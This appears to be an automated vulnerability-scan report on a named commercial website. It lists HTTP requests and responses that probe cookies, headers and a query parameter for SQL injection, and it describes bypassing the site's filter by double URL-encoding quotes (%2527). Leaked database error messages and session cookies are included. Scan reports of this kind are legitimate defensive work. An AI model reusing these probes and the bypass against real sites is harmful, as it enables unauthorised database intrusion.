GET /component/jsetup/comment/add.html%2527?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:26:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/add.html%2527%2527?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:26:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:26:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:26:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /component/jsetup/comment/add.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:49:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/add.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:49:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:22:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141%2527%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:22:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:22:38 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:22:38 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:13:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:13:54 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:13:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:13:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The commenttype parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the commenttype parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the commenttype request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/jsetup/comment/add.html?commenttype=20%2527&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:05:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/add.html?commenttype=20%2527%2527&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:05:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:05:18 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:05:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:08:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:08:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:08:51 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:08:51 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:21:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/jsetup/comment/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=90&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY2Jml0ZW1pZD03MCZmb3JtYXQ9aHRtbCZpZD05MDphbmFseXRpY3MtdG9vbGJhciZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:11:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=90&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY2Jml0ZW1pZD03MCZmb3JtYXQ9aHRtbCZpZD05MDphbmFseXRpY3MtdG9vbGJhciZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; 